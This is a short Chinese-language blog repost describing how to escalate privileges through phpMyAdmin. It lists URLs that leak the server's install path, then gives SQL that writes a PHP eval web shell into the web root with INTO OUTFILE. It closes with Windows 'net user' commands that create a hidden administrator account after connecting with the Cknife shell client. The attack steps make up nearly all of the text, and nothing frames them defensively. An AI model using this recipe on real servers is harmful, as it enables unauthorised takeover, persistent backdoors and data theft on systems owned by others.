您的位置：首页 > 编程语言 > PHP开发

利用phpMyAdmin提权

2016-04-26 07:30 603 查看

利用phpMyAdmin提权

发表于 2016-03-31 | 分类于 phpMyAdmin | 暂无评论 | 9次阅读

爆路径

/phpmyadmin/libraries/lect_lang.lib.php
/phpMyAdmin/index.php?lang[]=1
/phpMyAdmin/phpinfo.php
/load_file()
/phpmyadmin/themes/darkblue_orange/layout.inc.php
/phpmyadmin/libraries/select_lang.lib.php
/phpmyadmin/libraries/lect_lang.lib.php
/phpmyadmin/libraries/mcrypt.lib.php

得到物理路径 C:\wamp\www\phpmyadmin\themes\darkblue_orange\layout.inc.php

写马

Create TABLE a (cmd text NOT NULL);
Insert INTO a (cmd) VALUES("<?php eval($_POST[Cknife]);?>");
select cmd from a into outfile "C:/wamp/www/phpmyadmin/d.php";
Drop TABLE IF EXISTS a;

获得webshell

最后用Cknife连接，创建帐户并添加到管理员用户组

net user admin admin /add

net localgroup administrator admin /add

#phpMyAdmin 原文链接：http://blog.alpace.xyz/2016/03/31/20160331/

内容来自用户分享和网络整理，不保证内容的准确性，如有侵权内容，可联系管理员处理

标签：

相关文章推荐

新的分享

章节导航